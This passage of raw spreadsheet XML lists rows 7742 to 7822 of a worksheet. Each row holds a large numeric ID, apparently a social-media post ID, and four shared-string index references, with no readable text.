      </c>
    </row>
    <row r="7742" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A7742">
        <v>1.2330520087829901E+18</v>
      </c>
      <c r="B7742" t="s">
        <v>18686</v>
      </c>
      <c r="C7742" t="s">
        <v>1</v>
      </c>
      <c r="D7742" t="s">
        <v>18687</v>
      </c>
      <c r="E7742" t="s">
        <v>2409</v>
      </c>
    </row>
    <row r="7743" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A7743">
        <v>1.2330519897701901E+18</v>
      </c>
      <c r="B7743" t="s">
        <v>18688</v>
      </c>
      <c r="C7743" t="s">
        <v>1</v>
      </c>
      <c r="D7743" t="s">
        <v>18689</v>
      </c>
      <c r="E7743" t="s">
        <v>18690</v>
      </c>
    </row>
    <row r="7744" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A7744">
        <v>1.2330518043484201E+18</v>
      </c>
      <c r="B7744" t="s">
        <v>18691</v>
      </c>
      <c r="C7744" t="s">
        <v>1</v>
      </c>
      <c r="D7744" t="s">
        <v>18692</v>
      </c>
      <c r="E7744" t="s">
        <v>16149</v>
      </c>
    </row>
    <row r="7745" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A7745">
        <v>1.2330517906623401E+18</v>
      </c>
      <c r="B7745" t="s">
        <v>18693</v>
      </c>
      <c r="C7745" t="s">
        <v>1</v>
      </c>
      <c r="D7745" t="s">
        <v>18694</v>
      </c>
      <c r="E7745" t="s">
        <v>1030</v>
      </c>
    </row>
    <row r="7746" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A7746">
        <v>1.2330517327767099E+18</v>
      </c>
      <c r="B7746" t="s">
        <v>18695</v>
      </c>
      <c r="C7746" t="s">
        <v>1</v>
      </c>
      <c r="D7746" t="s">
        <v>18696</v>
      </c>
      <c r="E7746" t="s">
        <v>8020</v>
      </c>
    </row>
    <row r="7747" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A7747">
        <v>1.2330516982282701E+18</v>
      </c>
      <c r="B7747" t="s">
        <v>18697</v>
      </c>
      <c r="C7747" t="s">
        <v>1</v>
      </c>
      <c r="D7747" t="s">
        <v>18698</v>
      </c>
      <c r="E7747" t="s">
        <v>18699</v>
      </c>
    </row>
    <row r="7748" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A7748">
        <v>1.2330516756585999E+18</v>
      </c>
      <c r="B7748" t="s">
        <v>18700</v>
      </c>
      <c r="C7748" t="s">
        <v>1</v>
      </c>
      <c r="D7748" t="s">
        <v>18701</v>
      </c>
      <c r="E7748" t="s">
        <v>4644</v>
      </c>
    </row>
    <row r="7749" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A7749">
        <v>1.2330516267783501E+18</v>
      </c>
      <c r="B7749" t="s">
        <v>18702</v>
      </c>
      <c r="C7749" t="s">
        <v>1</v>
      </c>
      <c r="D7749" t="s">
        <v>18703</v>
      </c>
      <c r="E7749" t="s">
        <v>18704</v>
      </c>
    </row>
    <row r="7750" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A7750">
        <v>1.2330514351825001E+18</v>
      </c>
      <c r="B7750" t="s">
        <v>18705</v>
      </c>
      <c r="C7750" t="s">
        <v>1</v>
      </c>
      <c r="D7750" t="s">
        <v>18706</v>
      </c>
      <c r="E7750" t="s">
        <v>195</v>
      </c>
    </row>
    <row r="7751" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A7751">
        <v>1.2330513235552499E+18</v>
      </c>
      <c r="B7751" t="s">
        <v>18707</v>
      </c>
      <c r="C7751" t="s">
        <v>1</v>
      </c>
      <c r="D7751" t="s">
        <v>18708</v>
      </c>
      <c r="E7751" t="s">
        <v>18709</v>
      </c>
    </row>
    <row r="7752" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A7752">
        <v>1.2330510287167401E+18</v>
      </c>
      <c r="B7752" t="s">
        <v>18710</v>
      </c>
      <c r="C7752" t="s">
        <v>1</v>
      </c>
      <c r="D7752" t="s">
        <v>18711</v>
      </c>
      <c r="E7752" t="s">
        <v>18712</v>
      </c>
    </row>
    <row r="7753" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A7753">
        <v>1.2330509941388001E+18</v>
      </c>
      <c r="B7753" t="s">
        <v>18713</v>
      </c>
      <c r="C7753" t="s">
        <v>1</v>
      </c>
      <c r="D7753" t="s">
        <v>18714</v>
      </c>
      <c r="E7753" t="s">
        <v>885</v>
      </c>
    </row>
    <row r="7754" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A7754">
        <v>1.23305085126834E+18</v>
      </c>
      <c r="B7754" t="s">
        <v>18715</v>
      </c>
      <c r="C7754" t="s">
        <v>1</v>
      </c>
      <c r="D7754" t="s">
        <v>18716</v>
      </c>
      <c r="E7754" t="s">
        <v>13187</v>
      </c>
    </row>
    <row r="7755" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A7755">
        <v>1.2330504967069299E+18</v>
      </c>
      <c r="B7755" t="s">
        <v>18717</v>
      </c>
      <c r="C7755" t="s">
        <v>1</v>
      </c>
      <c r="D7755" t="s">
        <v>18718</v>
      </c>
      <c r="E7755" t="s">
        <v>2071</v>
      </c>
    </row>
    <row r="7756" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A7756">
        <v>1.2330504113653499E+18</v>
      </c>
      <c r="B7756" t="s">
        <v>18719</v>
      </c>
      <c r="C7756" t="s">
        <v>1</v>
      </c>
      <c r="D7756" t="s">
        <v>18720</v>
      </c>
      <c r="E7756" t="s">
        <v>203</v>
      </c>
    </row>
    <row r="7757" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A7757">
        <v>1.2330496606354299E+18</v>
      </c>
      <c r="B7757" t="s">
        <v>18721</v>
      </c>
      <c r="C7757" t="s">
        <v>1</v>
      </c>
      <c r="D7757" t="s">
        <v>2456</v>
      </c>
      <c r="E7757" t="s">
        <v>2102</v>
      </c>
    </row>
    <row r="7758" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A7758">
        <v>1.2330492703386399E+18</v>
      </c>
      <c r="B7758" t="s">
        <v>18722</v>
      </c>
      <c r="C7758" t="s">
        <v>1</v>
      </c>
      <c r="D7758" t="s">
        <v>18723</v>
      </c>
      <c r="E7758" t="s">
        <v>18724</v>
      </c>
    </row>
    <row r="7759" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A7759">
        <v>1.2330491667855301E+18</v>
      </c>
      <c r="B7759" t="s">
        <v>18725</v>
      </c>
      <c r="C7759" t="s">
        <v>1</v>
      </c>
      <c r="D7759" t="s">
        <v>14456</v>
      </c>
      <c r="E7759" t="s">
        <v>14450</v>
      </c>
    </row>
    <row r="7760" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A7760">
        <v>1.23304891091617E+18</v>
      </c>
      <c r="B7760" t="s">
        <v>18726</v>
      </c>
      <c r="C7760" t="s">
        <v>1</v>
      </c>
      <c r="D7760" t="s">
        <v>18727</v>
      </c>
      <c r="E7760" t="s">
        <v>14269</v>
      </c>
    </row>
    <row r="7761" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A7761">
        <v>1.2330488044773399E+18</v>
      </c>
      <c r="B7761" t="s">
        <v>18728</v>
      </c>
      <c r="C7761" t="s">
        <v>1</v>
      </c>
      <c r="D7761" t="s">
        <v>18729</v>
      </c>
      <c r="E7761" t="s">
        <v>18730</v>
      </c>
    </row>
    <row r="7762" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A7762">
        <v>1.2330484110389801E+18</v>
      </c>
      <c r="B7762" t="s">
        <v>18731</v>
      </c>
      <c r="C7762" t="s">
        <v>1</v>
      </c>
      <c r="D7762" t="s">
        <v>18732</v>
      </c>
      <c r="E7762" t="s">
        <v>1743</v>
      </c>
    </row>
    <row r="7763" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A7763">
        <v>1.2330479900566899E+18</v>
      </c>
      <c r="B7763" t="s">
        <v>18733</v>
      </c>
      <c r="C7763" t="s">
        <v>1</v>
      </c>
      <c r="D7763" t="s">
        <v>18734</v>
      </c>
      <c r="E7763" t="s">
        <v>5019</v>
      </c>
    </row>
    <row r="7764" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A7764">
        <v>1.2330474034959201E+18</v>
      </c>
      <c r="B7764" t="s">
        <v>18735</v>
      </c>
      <c r="C7764" t="s">
        <v>1</v>
      </c>
      <c r="D7764" t="s">
        <v>18736</v>
      </c>
      <c r="E7764" t="s">
        <v>18737</v>
      </c>
    </row>
    <row r="7765" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A7765">
        <v>1.23304698010175E+18</v>
      </c>
      <c r="B7765" t="s">
        <v>18738</v>
      </c>
      <c r="C7765" t="s">
        <v>1</v>
      </c>
      <c r="D7765" t="s">
        <v>18739</v>
      </c>
      <c r="E7765" t="s">
        <v>18740</v>
      </c>
    </row>
    <row r="7766" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A7766">
        <v>1.2330467515458701E+18</v>
      </c>
      <c r="B7766" t="s">
        <v>18741</v>
      </c>
      <c r="C7766" t="s">
        <v>1</v>
      </c>
      <c r="D7766" t="s">
        <v>18742</v>
      </c>
      <c r="E7766" t="s">
        <v>18743</v>
      </c>
    </row>
    <row r="7767" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A7767">
        <v>1.2330462438085399E+18</v>
      </c>
      <c r="B7767" t="s">
        <v>18744</v>
      </c>
      <c r="C7767" t="s">
        <v>1</v>
      </c>
      <c r="D7767" t="s">
        <v>18745</v>
      </c>
      <c r="E7767" t="s">
        <v>1340</v>
      </c>
    </row>
    <row r="7768" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A7768">
        <v>1.23304619029762E+18</v>
      </c>
      <c r="B7768" t="s">
        <v>18746</v>
      </c>
      <c r="C7768" t="s">
        <v>1</v>
      </c>
      <c r="D7768" t="s">
        <v>18747</v>
      </c>
      <c r="E7768" t="s">
        <v>78</v>
      </c>
    </row>
    <row r="7769" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A7769">
        <v>1.23304604362688E+18</v>
      </c>
      <c r="B7769" t="s">
        <v>18748</v>
      </c>
      <c r="C7769" t="s">
        <v>1</v>
      </c>
      <c r="D7769" t="s">
        <v>18749</v>
      </c>
      <c r="E7769" t="s">
        <v>18750</v>
      </c>
    </row>
    <row r="7770" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A7770">
        <v>1.23304590571824E+18</v>
      </c>
      <c r="B7770" t="s">
        <v>18751</v>
      </c>
      <c r="C7770" t="s">
        <v>1</v>
      </c>
      <c r="D7770" t="s">
        <v>18752</v>
      </c>
      <c r="E7770" t="s">
        <v>1474</v>
      </c>
    </row>
    <row r="7771" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A7771">
        <v>1.23304586195074E+18</v>
      </c>
      <c r="B7771" t="s">
        <v>18753</v>
      </c>
      <c r="C7771" t="s">
        <v>1</v>
      </c>
      <c r="D7771" t="s">
        <v>18754</v>
      </c>
      <c r="E7771" t="s">
        <v>2472</v>
      </c>
    </row>
    <row r="7772" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A7772">
        <v>1.23304573297168E+18</v>
      </c>
      <c r="B7772" t="s">
        <v>18755</v>
      </c>
      <c r="C7772" t="s">
        <v>1</v>
      </c>
      <c r="D7772" t="s">
        <v>18756</v>
      </c>
      <c r="E7772" t="s">
        <v>8822</v>
      </c>
    </row>
    <row r="7773" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A7773">
        <v>1.23304554458032E+18</v>
      </c>
      <c r="B7773" t="s">
        <v>18757</v>
      </c>
      <c r="C7773" t="s">
        <v>1</v>
      </c>
      <c r="D7773" t="s">
        <v>18758</v>
      </c>
      <c r="E7773" t="s">
        <v>4400</v>
      </c>
    </row>
    <row r="7774" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A7774">
        <v>1.23304533023885E+18</v>
      </c>
      <c r="B7774" t="s">
        <v>18759</v>
      </c>
      <c r="C7774" t="s">
        <v>1</v>
      </c>
      <c r="D7774" t="s">
        <v>18760</v>
      </c>
      <c r="E7774" t="s">
        <v>18761</v>
      </c>
    </row>
    <row r="7775" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A7775">
        <v>1.2330451245373801E+18</v>
      </c>
      <c r="B7775" t="s">
        <v>18762</v>
      </c>
      <c r="C7775" t="s">
        <v>1</v>
      </c>
      <c r="D7775" t="s">
        <v>18763</v>
      </c>
      <c r="E7775" t="s">
        <v>18764</v>
      </c>
    </row>
    <row r="7776" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A7776">
        <v>1.2330449522061399E+18</v>
      </c>
      <c r="B7776" t="s">
        <v>18765</v>
      </c>
      <c r="C7776" t="s">
        <v>1</v>
      </c>
      <c r="D7776" t="s">
        <v>18766</v>
      </c>
      <c r="E7776" t="s">
        <v>18767</v>
      </c>
    </row>
    <row r="7777" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A7777">
        <v>1.2330448691296699E+18</v>
      </c>
      <c r="B7777" t="s">
        <v>18768</v>
      </c>
      <c r="C7777" t="s">
        <v>1</v>
      </c>
      <c r="D7777" t="s">
        <v>18769</v>
      </c>
      <c r="E7777" t="s">
        <v>2235</v>
      </c>
    </row>
    <row r="7778" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A7778">
        <v>1.23304447375779E+18</v>
      </c>
      <c r="B7778" t="s">
        <v>18770</v>
      </c>
      <c r="C7778" t="s">
        <v>1</v>
      </c>
      <c r="D7778" t="s">
        <v>18771</v>
      </c>
      <c r="E7778" t="s">
        <v>18772</v>
      </c>
    </row>
    <row r="7779" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A7779">
        <v>1.23304446066737E+18</v>
      </c>
      <c r="B7779" t="s">
        <v>18773</v>
      </c>
      <c r="C7779" t="s">
        <v>1</v>
      </c>
      <c r="D7779" t="s">
        <v>18774</v>
      </c>
      <c r="E7779" t="s">
        <v>2489</v>
      </c>
    </row>
    <row r="7780" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A7780">
        <v>1.2330443814789299E+18</v>
      </c>
      <c r="B7780" t="s">
        <v>18775</v>
      </c>
      <c r="C7780" t="s">
        <v>1</v>
      </c>
      <c r="D7780" t="s">
        <v>18776</v>
      </c>
      <c r="E7780" t="s">
        <v>6261</v>
      </c>
    </row>
    <row r="7781" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A7781">
        <v>1.2330443128850501E+18</v>
      </c>
      <c r="B7781" t="s">
        <v>18777</v>
      </c>
      <c r="C7781" t="s">
        <v>1</v>
      </c>
      <c r="D7781" t="s">
        <v>18778</v>
      </c>
      <c r="E7781" t="s">
        <v>5049</v>
      </c>
    </row>
    <row r="7782" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A7782">
        <v>1.23304414235326E+18</v>
      </c>
      <c r="B7782" t="s">
        <v>18779</v>
      </c>
      <c r="C7782" t="s">
        <v>1</v>
      </c>
      <c r="D7782" t="s">
        <v>18780</v>
      </c>
      <c r="E7782" t="s">
        <v>2498</v>
      </c>
    </row>
    <row r="7783" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A7783">
        <v>1.2330441183450399E+18</v>
      </c>
      <c r="B7783" t="s">
        <v>18781</v>
      </c>
      <c r="C7783" t="s">
        <v>1</v>
      </c>
      <c r="D7783" t="s">
        <v>18782</v>
      </c>
      <c r="E7783" t="s">
        <v>1334</v>
      </c>
    </row>
    <row r="7784" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A7784">
        <v>1.2330439972093801E+18</v>
      </c>
      <c r="B7784" t="s">
        <v>18783</v>
      </c>
      <c r="C7784" t="s">
        <v>1</v>
      </c>
      <c r="D7784" t="s">
        <v>18784</v>
      </c>
      <c r="E7784" t="s">
        <v>1030</v>
      </c>
    </row>
    <row r="7785" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A7785">
        <v>1.2330439932624599E+18</v>
      </c>
      <c r="B7785" t="s">
        <v>18785</v>
      </c>
      <c r="C7785" t="s">
        <v>1</v>
      </c>
      <c r="D7785" t="s">
        <v>18786</v>
      </c>
      <c r="E7785" t="s">
        <v>1030</v>
      </c>
    </row>
    <row r="7786" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A7786">
        <v>1.2330439910394701E+18</v>
      </c>
      <c r="B7786" t="s">
        <v>18787</v>
      </c>
      <c r="C7786" t="s">
        <v>1</v>
      </c>
      <c r="D7786" t="s">
        <v>18788</v>
      </c>
      <c r="E7786" t="s">
        <v>1030</v>
      </c>
    </row>
    <row r="7787" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A7787">
        <v>1.2330437856779799E+18</v>
      </c>
      <c r="B7787" t="s">
        <v>18789</v>
      </c>
      <c r="C7787" t="s">
        <v>1</v>
      </c>
      <c r="D7787" t="s">
        <v>12110</v>
      </c>
      <c r="E7787" t="s">
        <v>384</v>
      </c>
    </row>
    <row r="7788" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A7788">
        <v>1.23304317798623E+18</v>
      </c>
      <c r="B7788" t="s">
        <v>18790</v>
      </c>
      <c r="C7788" t="s">
        <v>1</v>
      </c>
      <c r="D7788" t="s">
        <v>18791</v>
      </c>
      <c r="E7788" t="s">
        <v>2560</v>
      </c>
    </row>
    <row r="7789" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A7789">
        <v>1.23304312718478E+18</v>
      </c>
      <c r="B7789" t="s">
        <v>18792</v>
      </c>
      <c r="C7789" t="s">
        <v>1</v>
      </c>
      <c r="D7789" t="s">
        <v>18793</v>
      </c>
      <c r="E7789" t="s">
        <v>18794</v>
      </c>
    </row>
    <row r="7790" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A7790">
        <v>1.2330421364357499E+18</v>
      </c>
      <c r="B7790" t="s">
        <v>18795</v>
      </c>
      <c r="C7790" t="s">
        <v>1</v>
      </c>
      <c r="D7790" t="s">
        <v>18796</v>
      </c>
      <c r="E7790" t="s">
        <v>1474</v>
      </c>
    </row>
    <row r="7791" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A7791">
        <v>1.2330416313072799E+18</v>
      </c>
      <c r="B7791" t="s">
        <v>18797</v>
      </c>
      <c r="C7791" t="s">
        <v>1</v>
      </c>
      <c r="D7791" t="s">
        <v>14452</v>
      </c>
      <c r="E7791" t="s">
        <v>14450</v>
      </c>
    </row>
    <row r="7792" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A7792">
        <v>1.2330415747848801E+18</v>
      </c>
      <c r="B7792" t="s">
        <v>18798</v>
      </c>
      <c r="C7792" t="s">
        <v>1</v>
      </c>
      <c r="D7792" t="s">
        <v>18799</v>
      </c>
      <c r="E7792" t="s">
        <v>18800</v>
      </c>
    </row>
    <row r="7793" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A7793">
        <v>1.23304086833827E+18</v>
      </c>
      <c r="B7793" t="s">
        <v>18801</v>
      </c>
      <c r="C7793" t="s">
        <v>1</v>
      </c>
      <c r="D7793" t="s">
        <v>18802</v>
      </c>
      <c r="E7793" t="s">
        <v>18803</v>
      </c>
    </row>
    <row r="7794" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A7794">
        <v>1.2330404109410401E+18</v>
      </c>
      <c r="B7794" t="s">
        <v>18804</v>
      </c>
      <c r="C7794" t="s">
        <v>1</v>
      </c>
      <c r="D7794" t="s">
        <v>18805</v>
      </c>
      <c r="E7794" t="s">
        <v>2533</v>
      </c>
    </row>
    <row r="7795" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A7795">
        <v>1.2330403487184699E+18</v>
      </c>
      <c r="B7795" t="s">
        <v>18806</v>
      </c>
      <c r="C7795" t="s">
        <v>1</v>
      </c>
      <c r="D7795" t="s">
        <v>18807</v>
      </c>
      <c r="E7795" t="s">
        <v>6160</v>
      </c>
    </row>
    <row r="7796" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A7796">
        <v>1.23303965145744E+18</v>
      </c>
      <c r="B7796" t="s">
        <v>18808</v>
      </c>
      <c r="C7796" t="s">
        <v>1</v>
      </c>
      <c r="D7796" t="s">
        <v>18809</v>
      </c>
      <c r="E7796" t="s">
        <v>18810</v>
      </c>
    </row>
    <row r="7797" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A7797">
        <v>1.2330393659888399E+18</v>
      </c>
      <c r="B7797" t="s">
        <v>18811</v>
      </c>
      <c r="C7797" t="s">
        <v>1</v>
      </c>
      <c r="D7797" t="s">
        <v>18812</v>
      </c>
      <c r="E7797" t="s">
        <v>18813</v>
      </c>
    </row>
    <row r="7798" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A7798">
        <v>1.2330392995637E+18</v>
      </c>
      <c r="B7798" t="s">
        <v>18814</v>
      </c>
      <c r="C7798" t="s">
        <v>1</v>
      </c>
      <c r="D7798" t="s">
        <v>18815</v>
      </c>
      <c r="E7798" t="s">
        <v>14737</v>
      </c>
    </row>
    <row r="7799" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A7799">
        <v>1.2330388839416901E+18</v>
      </c>
      <c r="B7799" t="s">
        <v>18816</v>
      </c>
      <c r="C7799" t="s">
        <v>1</v>
      </c>
      <c r="D7799" t="s">
        <v>18817</v>
      </c>
      <c r="E7799" t="s">
        <v>18818</v>
      </c>
    </row>
    <row r="7800" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A7800">
        <v>1.23303876249149E+18</v>
      </c>
      <c r="B7800" t="s">
        <v>18819</v>
      </c>
      <c r="C7800" t="s">
        <v>1</v>
      </c>
      <c r="D7800" t="s">
        <v>18820</v>
      </c>
      <c r="E7800" t="s">
        <v>1816</v>
      </c>
    </row>
    <row r="7801" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A7801">
        <v>1.23303801202126E+18</v>
      </c>
      <c r="B7801" t="s">
        <v>18821</v>
      </c>
      <c r="C7801" t="s">
        <v>1</v>
      </c>
      <c r="D7801" t="s">
        <v>18822</v>
      </c>
      <c r="E7801" t="s">
        <v>18823</v>
      </c>
    </row>
    <row r="7802" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A7802">
        <v>1.23303783298338E+18</v>
      </c>
      <c r="B7802" t="s">
        <v>18824</v>
      </c>
      <c r="C7802" t="s">
        <v>1</v>
      </c>
      <c r="D7802" t="s">
        <v>18825</v>
      </c>
      <c r="E7802" t="s">
        <v>8460</v>
      </c>
    </row>
    <row r="7803" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A7803">
        <v>1.23303769026797E+18</v>
      </c>
      <c r="B7803" t="s">
        <v>18826</v>
      </c>
      <c r="C7803" t="s">
        <v>1</v>
      </c>
      <c r="D7803" t="s">
        <v>18827</v>
      </c>
      <c r="E7803" t="s">
        <v>18828</v>
      </c>
    </row>
    <row r="7804" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A7804">
        <v>1.2330375304228401E+18</v>
      </c>
      <c r="B7804" t="s">
        <v>18829</v>
      </c>
      <c r="C7804" t="s">
        <v>1</v>
      </c>
      <c r="D7804" t="s">
        <v>18830</v>
      </c>
      <c r="E7804" t="s">
        <v>18831</v>
      </c>
    </row>
    <row r="7805" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A7805">
        <v>1.2330370658493701E+18</v>
      </c>
      <c r="B7805" t="s">
        <v>18832</v>
      </c>
      <c r="C7805" t="s">
        <v>1</v>
      </c>
      <c r="D7805" t="s">
        <v>18833</v>
      </c>
      <c r="E7805" t="s">
        <v>11835</v>
      </c>
    </row>
    <row r="7806" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A7806">
        <v>1.2330370637982899E+18</v>
      </c>
      <c r="B7806" t="s">
        <v>18832</v>
      </c>
      <c r="C7806" t="s">
        <v>1</v>
      </c>
      <c r="D7806" t="s">
        <v>18834</v>
      </c>
      <c r="E7806" t="s">
        <v>5865</v>
      </c>
    </row>
    <row r="7807" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A7807">
        <v>1.2330366333200599E+18</v>
      </c>
      <c r="B7807" t="s">
        <v>18835</v>
      </c>
      <c r="C7807" t="s">
        <v>1</v>
      </c>
      <c r="D7807" t="s">
        <v>18836</v>
      </c>
      <c r="E7807" t="s">
        <v>18837</v>
      </c>
    </row>
    <row r="7808" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A7808">
        <v>1.23303572460306E+18</v>
      </c>
      <c r="B7808" t="s">
        <v>18838</v>
      </c>
      <c r="C7808" t="s">
        <v>1</v>
      </c>
      <c r="D7808" t="s">
        <v>18839</v>
      </c>
      <c r="E7808" t="s">
        <v>18840</v>
      </c>
    </row>
    <row r="7809" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A7809">
        <v>1.23303530581438E+18</v>
      </c>
      <c r="B7809" t="s">
        <v>18841</v>
      </c>
      <c r="C7809" t="s">
        <v>1</v>
      </c>
      <c r="D7809" t="s">
        <v>18842</v>
      </c>
      <c r="E7809" t="s">
        <v>236</v>
      </c>
    </row>
    <row r="7810" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A7810">
        <v>1.23303444562991E+18</v>
      </c>
      <c r="B7810" t="s">
        <v>18843</v>
      </c>
      <c r="C7810" t="s">
        <v>1</v>
      </c>
      <c r="D7810" t="s">
        <v>18844</v>
      </c>
      <c r="E7810" t="s">
        <v>18845</v>
      </c>
    </row>
    <row r="7811" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A7811">
        <v>1.2330344414397599E+18</v>
      </c>
      <c r="B7811" t="s">
        <v>18846</v>
      </c>
      <c r="C7811" t="s">
        <v>1</v>
      </c>
      <c r="D7811" t="s">
        <v>18847</v>
      </c>
      <c r="E7811" t="s">
        <v>18848</v>
      </c>
    </row>
    <row r="7812" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A7812">
        <v>1.2330343412839601E+18</v>
      </c>
      <c r="B7812" t="s">
        <v>18849</v>
      </c>
      <c r="C7812" t="s">
        <v>1</v>
      </c>
      <c r="D7812" t="s">
        <v>18850</v>
      </c>
      <c r="E7812" t="s">
        <v>18851</v>
      </c>
    </row>
    <row r="7813" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A7813">
        <v>1.2330340707177999E+18</v>
      </c>
      <c r="B7813" t="s">
        <v>18852</v>
      </c>
      <c r="C7813" t="s">
        <v>1</v>
      </c>
      <c r="D7813" t="s">
        <v>18853</v>
      </c>
      <c r="E7813" t="s">
        <v>18854</v>
      </c>
    </row>
    <row r="7814" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A7814">
        <v>1.2330335539963599E+18</v>
      </c>
      <c r="B7814" t="s">
        <v>18855</v>
      </c>
      <c r="C7814" t="s">
        <v>1</v>
      </c>
      <c r="D7814" t="s">
        <v>18856</v>
      </c>
      <c r="E7814" t="s">
        <v>18857</v>
      </c>
    </row>
    <row r="7815" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A7815">
        <v>1.23303350440275E+18</v>
      </c>
      <c r="B7815" t="s">
        <v>18858</v>
      </c>
      <c r="C7815" t="s">
        <v>1</v>
      </c>
      <c r="D7815" t="s">
        <v>18859</v>
      </c>
      <c r="E7815" t="s">
        <v>18860</v>
      </c>
    </row>
    <row r="7816" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A7816">
        <v>1.2330331412600801E+18</v>
      </c>
      <c r="B7816" t="s">
        <v>18861</v>
      </c>
      <c r="C7816" t="s">
        <v>1</v>
      </c>
      <c r="D7816" t="s">
        <v>18862</v>
      </c>
      <c r="E7816" t="s">
        <v>18863</v>
      </c>
    </row>
    <row r="7817" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A7817">
        <v>1.23303307717934E+18</v>
      </c>
      <c r="B7817" t="s">
        <v>18864</v>
      </c>
      <c r="C7817" t="s">
        <v>1</v>
      </c>
      <c r="D7817" t="s">
        <v>18865</v>
      </c>
      <c r="E7817" t="s">
        <v>18866</v>
      </c>
    </row>
    <row r="7818" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A7818">
        <v>1.23303287716573E+18</v>
      </c>
      <c r="B7818" t="s">
        <v>18867</v>
      </c>
      <c r="C7818" t="s">
        <v>1</v>
      </c>
      <c r="D7818" t="s">
        <v>13912</v>
      </c>
      <c r="E7818" t="s">
        <v>12951</v>
      </c>
    </row>
    <row r="7819" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A7819">
        <v>1.2330326724207301E+18</v>
      </c>
      <c r="B7819" t="s">
        <v>18868</v>
      </c>
      <c r="C7819" t="s">
        <v>1</v>
      </c>
      <c r="D7819" t="s">
        <v>18869</v>
      </c>
      <c r="E7819" t="s">
        <v>18870</v>
      </c>
    </row>
    <row r="7820" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A7820">
        <v>1.23303237011616E+18</v>
      </c>
      <c r="B7820" t="s">
        <v>18871</v>
      </c>
      <c r="C7820" t="s">
        <v>1</v>
      </c>
      <c r="D7820" t="s">
        <v>18872</v>
      </c>
      <c r="E7820" t="s">
        <v>18873</v>
      </c>
    </row>
    <row r="7821" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A7821">
        <v>1.2330321399370199E+18</v>
      </c>
      <c r="B7821" t="s">
        <v>18874</v>
      </c>
      <c r="C7821" t="s">
        <v>1</v>
      </c>
      <c r="D7821" t="s">
        <v>18875</v>
      </c>
      <c r="E7821" t="s">
        <v>78</v>
      </c>
    </row>
    <row r="7822" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A7822">
        <v>1.2330320474778199E+18</v>
      </c>
      <c r="B7822" t="s">
        <v>18876</v>
      </c>
      <c r="C7822" t="s">
        <v>1</v>
      </c>
      <c r="D7822" t="s">
        <v>18877</v>
      </c>
      <c r="E7822" t="s">
        <v>18878</v>
      </c>
    </row>
    <row r="7823" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A7823">
